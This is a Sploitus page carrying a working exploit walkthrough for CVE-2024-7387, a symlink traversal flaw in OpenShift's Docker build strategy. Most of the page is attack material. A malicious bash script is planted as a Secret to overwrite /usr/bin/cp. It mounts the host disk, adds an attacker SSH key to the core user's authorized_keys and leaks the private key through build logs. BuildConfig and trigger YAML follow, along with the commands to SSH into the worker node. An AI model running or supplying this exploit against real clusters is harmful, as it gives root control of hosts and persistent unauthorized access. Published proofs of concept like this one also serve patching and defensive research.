## https://sploitus.com/exploit?id=64C38A18-AE31-5EAB-AF2D-550FD1EAD74F
### overview
[cve-2024-7387](https://nvd.nist.gov/vuln/detail/CVE-2024-7387) is a symlink traversal vulnerability in openshift's docker build strategy. attackers can mount a secret to a symlink pointing to `/usr/bin`, overwriting system binaries like `cp`. when openshift uses these compromised binaries during builds, it executes arbitrary code with root privileges, enabling full host compromise.
### exploit
clone the repository containing the vulnerable configuration:
```shell
git clone https://github.com/fatcatresearch/cve-2024-7387.git
cd cve-2024-7387
```
the repository contains a `Dockerfile` and a symbolic link `usr_bin` pointing to `/usr/bin`:
```Dockerfile
FROM fedora:latest
COPY . .
RUN ls -la && cat pwn.txt
```
create a secret containing the malicious bash payload named `cp`:
```yaml
# malicious-secret.yaml
kind: Secret
apiVersion: v1
metadata:
name: malicious-secret
stringData:
cp: |
#!/bin/bash
{
mkdir -p /mnt/h
mount /dev/vda4 /mnt/h 2>&1
ssh-keygen -t ed25519 -f /tmp/exploit_key -N "" -q
mkdir -p /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh
cat /tmp/exploit_key.pub >> /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys
chmod 600 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys
chown 1000:1000 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys
cat /tmp/exploit_key
} > /tmp/build/inputs/pwn.txt 2>&1
exit 0
type: Opaque
```
apply the secret:
```bash
oc apply -f malicious-secret.yaml
```
>the `cp` key in the secret will create a file named `cp`. when mounted via `destinationDir: usr_bin` (a symlink to `/usr/bin`), this file overwrites the legitimate `/usr/bin/cp` binary with the malicious script.
create a trigger secret:
```yaml
# trigger-secret.yaml
kind: Secret
apiVersion: v1
metadata:
name: trigger-secret
stringData:
trigger: pwned
type: Opaque
```
apply the trigger secret:
```bash
oc apply -f trigger-secret.yaml
```
>the secret will trigger openshift to use the `cp` command internally when mounting it, executing the malicious payload.
create the `BuildConfig` that mounts both secrets:
```yaml
# malicious-buildconfig.yaml
kind: BuildConfig
apiVersion: build.openshift.io/v1
metadata:
name: malicious-buildconfig
spec:
nodeSelector: null
strategy:
type: Docker
dockerStrategy:
dockerfilePath: Dockerfile
source:
type: Git
git:
uri: 'https://github.com/fatcatresearch/cve-2024-7387.git'
ref: main
contextDir: /
secrets:
- secret:
name: malicious-secret
destinationDir: usr_bin
- secret:
name: trigger-secret
```
>the `destinationDir: usr_bin` mounts the secret at `/tmp/build/inputs/usr_bin` & since `usr_bin` is a symlink to `/usr/bin`, the secret's `cp` file overwrites `/usr/bin/cp`. the trigger-secret mounts to the build context root, & when openshift copies it using the `cp` command, the malicious `/usr/bin/cp` script executes instead.
apply the build configuration:
```bash
oc apply -f malicious-buildconfig.yaml
```
start the build to execute the payload:
```shell
oc start-build malicious-buildconfig
```
check the build logs to verify the payload executed:
```shell
oc logs -f build/malicious-buildconfig-1
```
>the contents of `pwn.txt` displayed in the build logs confirm the malicious script executed successfully & contain the private SSH key needed for host access.
save the private key from the build logs, set correct permissions, & establish SSH connection to the worker node:
```shell
chmod 600 exploit_key
ssh -i exploit_key core@WORKER_IP
```